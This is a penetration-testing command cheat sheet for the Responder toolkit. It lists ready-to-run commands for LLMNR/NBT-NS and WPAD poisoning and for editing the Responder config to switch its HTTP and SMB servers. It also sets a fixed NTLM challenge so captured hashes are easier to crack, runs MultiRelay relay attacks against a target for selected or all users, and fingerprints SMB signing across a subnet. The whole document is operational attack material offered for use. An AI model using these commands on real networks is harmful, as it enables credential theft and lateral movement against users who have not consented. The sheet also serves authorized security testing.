% responder,llmnr,poisoning,mitm,infrastructure

# Launch responder on interface
responder -I <interface>

# Analyze mode (no poisoning)
responder -I <interface> -A

# Launch with WPAD file
responder -I <interface> --wpad

# Enable HTTP in Responder config
sed -i 's/HTTP = Off/HTTP = On/g' /etc/responder/Responder.conf && cat /etc/responder/Responder.conf | grep --color=never 'HTTP ='

# Disable HTTP in Responder config
sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf && cat /etc/responder/Responder.conf | grep --color=never 'HTTP ='

# Enable SMB in Responder config
sed -i 's/SMB = Off/SMB = On/g' /etc/responder/Responder.conf && cat /etc/responder/Responder.conf | grep --color=never 'SMB ='

# Disable SMB in Responder config
sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf && cat /etc/responder/Responder.conf | grep --color=never 'SMB ='

# Set NTLM challenge for cracking
sed -i 's/Challenge =.*/Challenge = <challenge>/' /etc/responder/Responder.conf

# Challenge reset
sed -i 's/Challenge =.*$/Challenge = 1122334455667788/g' /etc/responder/Responder.conf && cat /etc/responder/Responder.conf | grep --color=never 'Challenge =' 

# multirelay attack - user filtered (previous disable HTTP and SMB in Responder.conf)
multirelay -t <ip> -u <user1> <user2> 

# multirelay attack - all user (previous disable HTTP and SMB in Responder.conf)
multirelay -t <ip> -u ALL 

# runfinger - Responder-related utility which will finger a single IP address or an IP subnet and will reveal if a target requires SMB Signing or not.
runfinger -i <network_range> 
